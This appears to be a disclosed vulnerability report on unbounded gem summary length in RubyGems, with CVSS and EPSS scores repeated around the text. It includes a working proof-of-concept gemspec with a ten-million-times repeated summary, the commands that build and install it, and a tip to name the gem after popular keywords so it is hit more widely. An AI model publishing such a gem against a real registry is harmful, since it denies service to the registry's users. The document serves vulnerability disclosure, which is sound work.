7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.025 Low
EPSS
Percentile
89.0%
Currently, there is no limit for summary length. I think, pushing a gem whose summary is huge, will make gem search
unavailable.
This is not Arbitrary Code Execution, but really easy to attack. According to CVSS v3.0 Calculator, the severity is High (7.5).
gem search -d <substring-of-the-name-of-the-gem>
, but it will give no response.It may be good for the gem name to include a frequently-searched keyword, such as “foo-rails-bar” or “foo-sinatra-bar”.
Gem::Specification.new do |spec|
spec.name = "huge-summary"
spec.version = "0.0.1"
spec.authors = ["Yusuke Endoh"]
spec.email = ["[email protected]"]
spec.summary = "foo" * 10000000
spec.homepage = "http://example.com/"
spec.license = "MIT"
end
gem build huge-summary.gemspec
gem install huge-summary-0.0.1.gem
gem query huge-summary -d
It will not answer.
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.025 Low
EPSS
Percentile
89.0%